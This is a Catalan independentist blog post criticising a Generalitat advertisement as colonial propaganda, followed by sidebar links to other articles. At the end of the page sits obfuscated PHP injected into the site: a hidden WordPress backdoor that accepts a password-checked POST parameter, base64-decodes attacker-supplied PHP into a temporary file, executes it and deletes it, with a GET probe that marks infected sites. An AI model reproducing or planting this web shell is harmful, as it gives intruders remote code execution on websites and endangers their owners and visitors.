Propaganda colonial

10 de març de 2024 0

Aquest anunci és tòxic: “La Generalitat governa bé.” Ve a dir que no hi ha cap problema. Que es pot viure sota aquest règim. Que és millor abandonar tot intent d’assenyalar el conflicte i carències de fons i encarar-los.

Vol convèncer-nos que la mort és dolça.

Mireu-lo: https://x.com/govern/status/1765721034731253906?s=20

La situació de Catalunya es que està governada sota un règim polític que no té el consentiment majoritari entre la seva població. El més bàsic és que regeix un estatut que no es va votar, pero molt més important, que hi ha hagut un referèndum d’indendència inconseqüent.

Com que són responsables de no haver ni tan sols intentat que el referèndum fos inconseqüent, els és impossible fer política assenyalant aquest forat negre. No dic assenyalar amb paraules, sinó amb fets. Necessiten sempre fugir del conflicte, ho porten fent des del 2017.

I esclar: què vol dir “governar bé” a un poble que no pot decidir com vol ser governat? Es a dir, es pot governar bé un electorat al que no se li permet pronunciar-se sobre què es “bé”? Sent generós, això és despotisme, i sent realista, es una situació colonial.

El catalanisme havia arribat a un cul de sac la dècada passada quan vam entendre que no es podia governar bé sense tenir abans el consentiment del governat. Ara els partits destrueixen aquest consens i venen que es pot governar fantàsticament pels catalans ignorant aquest fet.

Però no han demostrat en absolut que es pugui governar bé fent veure que no passa res, com demostren fracassos en ensenyament, protecció social, habitatge, diversitat, energia, model econòmic o llengua, i les conseqüències a PISA, salaris, natalitat, lloguers, aigua.

Necessiten dir que tot va bé perquè si no, la seva existència com a govern colonial, que endolceix l’ocupació, es revela com a necessària per controlar els catalans.

A Catalunya es pot governar millor? Sí, esclar. Es tracta de fer les polítiques que van al cor dels conflictes que existeixen realment. Però ells no volen fer-ho perquè això revelaria el problema de fons i sempre trien les polítiques que fan menys fricció i tot és un fangar.

Per això diuen “més mestres,” “més mossos:” només poden anar contractant funcionaris sense fer-los fer el que caldria. Si fessin el que cal, tota aquesta bassa d’oli esclataria i es revelaria que la majoria de problemes que tenim són fruit de ser governats sense consentiment.

Per fer això, caldria entendre que la independència i governar bé només són possibles si es fan alhora. Si es governa sabent que la resposta honesta a “Què necessita Catalunya?” t’obliga sempre a aguantar la pressió de l’Estat i de qui confia en l’ocupació per imposar-se.

Aquest anunci mira de convèncer-nos que no hem de fer res, que tot ja va bé. Mira de convèncer-nos que l’ocupació és bona i que ja està bé que els espanyols decidexin per nosaltres qui i què hem de ser. Per això diu que la llengua va endavant, vol dir la castellana.

Etiquetes

Darrers articles

Què ha passat amb la CUP?

Vaig votar la CUP el desembre del 2017, després del Primer d’Octubre. Pensava que podien ser una força per controlar les pulsions destructives dels dos grans partits, que havien fet tot el possible per malbaratar la millor oportunitat que ha tingut Catalunya per treure’s el control d’Espanya del damunt i construir un món propi. Però […]

Per què Puigdemont no serveix per al futur de Catalunya

Puigdemont no serveix pel futur de Catalunya, almenys si el futur que volem no passa per la pacificació i la tornada enrere. La proposta de Puigdemont significa l’acceptació d’una falsa normalitat política que deixa en un calaix l’autodeterminació, convertint-la en una promesa etèria, i camina cap a un Govern autonòmic sense eines per defensar els […]

Propaganda colonial

Aquest anunci és tòxic: “La Generalitat governa bé.” Ve a dir que no hi ha cap problema. Que es pot viure sota aquest règim. Que és millor abandonar tot intent d’assenyalar el conflicte i carències de fons i encarar-los. Vol convèncer-nos que la mort és dolça. Mireu-lo: https://x.com/govern/status/1765721034731253906?s=20 La situació de Catalunya es que està […]

  • Cerca
  • if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}